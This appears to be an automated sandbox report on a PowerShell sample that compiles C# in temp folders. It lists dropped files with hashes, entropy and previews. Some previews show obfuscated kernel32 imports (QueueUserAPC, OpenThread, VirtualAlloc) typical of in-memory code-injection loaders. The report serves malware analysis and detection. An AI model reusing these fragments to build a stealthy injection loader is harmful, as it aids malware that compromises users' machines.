                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.0.cs"
                            C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):872
                            Entropy (8bit):5.326473552198273
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2aL/ETauKaM5DqBVKVrdFAMBJTH:Akka6CL/E+uKxDcVKdBJj
                            MD5:F82E94D258F3D67B8A490649E0C3D4CD
                            SHA1:FC0ED64AA500019001A82BD2C49D2358386C03C4
                            SHA-256:5821291F4341F52EFDB9CFF95808C4651DB8B2B95F511402B7985667167FE7D2
                            SHA-512:2B0E9907EA5C1E380D337A14014F53AA49D2BDF6E35A7DA0943DAEDD6DC49FF24AF5618EA713524E55049F62BCA3E7EAE3026BED5AC27A1D9F5FF726C07D83D2
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0924949403415782
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGzak7YnqqLcPN5Dlq5J:+RI+ycuZhNcakSoPNnqX
                            MD5:C2FED3B62C70792CE5FBC51B8104FF58
                            SHA1:A697EC532E1C75AC63A2D688109BE3A08DEAF138
                            SHA-256:8796FC4DF02E92514DFFF15DF891E70F332C9CE5009E2F4F4D9E10CAEA43F321
                            SHA-512:7C5D29E3C402DBD40505CE8BD3EA833EF0E67FC029B524466198964097979AC52CC452790F1C503A8674BDE4968FC93A0A652B95A4574A0A0C72A3903262D77B
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.u.p.b.k.l.0.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.u.p.b.k.l.0.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.225964153941322
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fpvQYOzxs7+AEszIN723fpvQYt9:p37Lvkmb6K2ae9WZETae+9
                            MD5:E417A790F5ECFFC57E19553220860204
                            SHA1:BB0C8AD3294335CCC3EBCA484E82CBC3B82212BC
                            SHA-256:531B60C5D5234C2C2E5D19FC1786C018D6EFCA1EE3A85072C7B57D5DE6B1CA53
                            SHA-512:2EDCEC5482641ADF4BF396846A92AED21D928CF60D61B7013190ECAC5C8962123B674EA20B568B227FA2D32AA95494FA887BAF666E45A589E32C41DACE567087
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.0.cs"
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6323976125718667
                            Encrypted:false
                            SSDEEP:24:etGSv8+mUE7R85z7woel/gO4/eiDPtkZfH8eWDZ0WI+ycuZhNcakSoPNnq:69XE7S5gGUiyJH8eAZX1ulca3Qq
                            MD5:7C00DECE0E6267D12BE7E759F865EBA6
                            SHA1:056B3240A7F7F9470CCD40E6C3540B0EAE77D0CC
                            SHA-256:952644239DF6BE31335F7E1AC3324A4D0E6424ED83296800B78644FC6DF6D5B0
                            SHA-512:C92B7CA867B544EFEEE1BC7BD1CBB1328873152907DFAFEDA79F9E5B44298974999B1CD61B99D2FD371C8E6D7A50EB0A6B618C536C5ACD656F956208F12366EC
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.310389610172864
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2atETaL4KaM5DqBVKVrdFAMBJTH:Akka6CtE+L4KxDcVKdBJj
                            MD5:710CC09857DFFC53DC33F785B737101D
                            SHA1:9CB5D3A127ACB37BAD9420BAB670D51F3AE02B26
                            SHA-256:065EC096833AAAD0FF61129A37E9C85A65A1E228F1D520683BEEBE57D5DEFE1F
                            SHA-512:1BED7D3D136AED086A1D61ABE2036C4850A886DA245BA8C3206E8AF988F85E4A8C2496928178863EF765F87AF472DC0E98BFAC83360C3094C0EB4AAEA3CB5D3B
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0921663918005518
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynwak7Ynqq61PN5Dlq5J:+RI+ycuZhNlwakS61PNnqX
                            MD5:8D38707C9DA074E8298A09CCEFE267D4
                            SHA1:4698BF2772175E64EA531AAF69A1830AB7A62240
                            SHA-256:E404495A4BA5D32217D87538BD4DB72E0CE80B741CC5318D16F621E1245A1310
                            SHA-512:EAD5798174C105EBD2FDC5EB87060C65209E35841BF5EE8627CDECF11F2F7A93FE10535B8CCED239987DBB9CCCF757A47378F726947A0E7FE1CD575CA19CBDE3
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.t.m.p.m.3.o.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.t.m.p.m.3.o.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.173224995113562
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fXWsor0JUzxs7+AEszIN723fXWsorO:p37Lvkmb6K2aP4Q+WZETaP4q
                            MD5:6BE56DACEFC57A712EA48F043E87C783
                            SHA1:D0681E001D2DABEF7D2E3993992EFAE42F65B518
                            SHA-256:9D8DC9E1EF8194163AD1488C6F630D49868ACCA608929CF85C3D080FB3FDE844
                            SHA-512:B0685B3E0CBD55C2DBDD7FB40F532CB62207A82FCB5A76D6451936A752200CC2C3CFB250D549A9A10CBE148FB6085D06E689FA4B37BEDFC32FBADE7D3ADD2CDC
                            Malicious:true
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.0.cs"
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6332356785832784
                            Encrypted:false
                            SSDEEP:24:etGSl8+mUE7R85z7woel/gTE4/eiDPtkZfmPENDZ0WI+ycuZhNlwakS61PNnq:67XE7S5gGT6iyJmPiZX1ullwa36vq
                            MD5:F5AA19BA9E19FFD0C554993566FCB9A1
                            SHA1:0A6CD2AF2C18AD6717A9F54CE6F1EC9D05DAAAA3
                            SHA-256:AA37819283565FA6E4FED32DFBD5BC46AFEE33457A0A05229EA1D74C112D7DF3
                            SHA-512:5BA356DE7E941FFB7F8A62E93612C01362DEC9A548CABFEE616A004EBC48D055909000D1C1BF0254206B25895D4A111A3204A4EC447B27DC8CFA19B5AC700D88
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.301489549454478
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2apETawKaM5DqBVKVrdFAMBJTH:Akka6CpE+wKxDcVKdBJj
                            MD5:B17FFB955F30A845D8BCF1C881AFD851
                            SHA1:13338CBE5E707CF0B7033C997E84A6AD19C18FF9
                            SHA-256:9AE5AB954FB134CE28AEC0E5F5F78551A6C27DDD0E2DA686F310B7C8C316F09D
                            SHA-512:E5A107C314E7E311314E36D0E7274F2C95DF94A65B0EFC1150ED7CF5537028918668CDBC9D740C0629AE128E31083C93A7ECCC663E9F13C21BE81D8F4382E681
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0890365915861624
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryH7ak7YnqqC0PN5Dlq5J:+RI+ycuZhN5akSnPNnqX
                            MD5:30A3097118EDB11AB1993E197C9073FA
                            SHA1:615B7D6D7126E88ABA3F17B6973630F89852F0AA
                            SHA-256:3B1178DF0B42B9FE32931ECD764E022C5C3993757D9E08888154E8CFE7DC3ACB
                            SHA-512:169145C229E843797950547FA2B91AD5F73A7874E3D498859748A7C29F41A7F61CB7EF60CFBBDA05818A38394BCBEA483363C1D46DAAE992CC938BA05FD190C5
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.o.n.0.v.o.s.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.o.n.0.v.o.s.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.19959834421907
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fpyAHUzxs7+AEszIN723fpy2:p37Lvkmb6K2axybWZETaxy2
                            MD5:5E6CD1F7B44B6E3B4C22EAF18C17B4E4
                            SHA1:7D5CB5F73BB6D2E8EC75A4ED779F3B8CF57CF23B
                            SHA-256:1FCA6CEC3FAF3F369A605C055F0EE65690ED9838A18EE01BA3D8B81315A211E2
                            SHA-512:5FABA37FFE22F142287B53D9A18F828EA5101576D953C0A10945F892523E5C39D6B7503BDC0BA004ACE656A498846AD74B2C284FD3B18AD6A7AD51ED5A15E0E1
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.0.cs"
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6318992955586533
                            Encrypted:false
                            SSDEEP:24:etGSQ8+mUE7R85z7woel/gf4/eiDPtkZfYmgfDZ0WI+ycuZhN5akSnPNnq:6aXE7S5gGZiyJYmoZX1ul5a31q
                            MD5:C9304AA657C4D4A6CB3A3F3E0BB4D7EF
                            SHA1:C8D07D9C483B5EE7CBB5B92B2BB07EB7A1EB48FD
                            SHA-256:9B80595D0F55E78C8CB1DF004FB37D5A94AF1B19C2C8806F426B2A6BA51A29E2
                            SHA-512:3E66DC953433A11FE0083B2D40935B147D9BF7CE93E11F2EBC47F4EB1B5362384E3889C73518910B010457D9961FE17860D58CFA38B3E8C4207F96462B848E74
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.292537978034834
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2aLETa2KaM5DqBVKVrdFAMBJTH:Akka6CLE+2KxDcVKdBJj
                            MD5:71B3F041076E3F95CFFD60D5175E75DF
                            SHA1:3E8BB427FD0CF04864317DB344053003824DFAA0
                            SHA-256:94857FB771A06BB6B94A77618220A25D5BED278081EDD5A4CC93ECF424D175A9
                            SHA-512:1DE93694D194DCF73BD6190B41C5E0DA69CDEB075E7E7338E51913775DBF3879571F159BC24A991F6E499E3D72CD1F8233B196C057C2FDDBDB9F9F0226EB523F
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                            C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.222834284403675
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f51n0zxs7+AEszIN723f5/H:p37Lvkmb6K2ah10WZETah/H
                            MD5:88C71B6719907B92C99029F9DF4C3781
                            SHA1:667EDB93A80D214FCD8C7DB39F368586A5FFFD2D
                            SHA-256:D8001B915AA15E64B32C56331B6749F7D4ADAB361228DDB3B81C1DAFEB82BDE3
                            SHA-512:6FF6E9812F843FA1AB77B3F176C58F5CABD9A93DCF344EE9AFF4943DB59BBD7A260545445B561A23D537C04F4DAFA79A9ADC45E52CDFA7695D20AA434F34B805
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.0.cs"
                            C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):872
                            Entropy (8bit):5.314771609463602
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2avVETapOKaM5DqBVKVrdFAMBJTH:Akka6C9E+pOKxDcVKdBJj
                            MD5:FBF42D3DC0BCD15D5634FB6E9DCE0B89
                            SHA1:A1E67FC78A33DC2FF510187D9A143B1980A198D8
                            SHA-256:7794B8E2C92DCFAA2E6E0F070A71F1B82EB43D0E1B962A1413E3D7B3DDFA1D97
                            SHA-512:8EB85167B7225987874B8EBDEE3EAAA5F7B7B476FBC4855C1E2A202A292B27BA7C398D49027F7647CA70CB217507EDFEE5287FBBF4F4432146C119FCEC142648
                            Malicious:false
                            Reputation:unknown
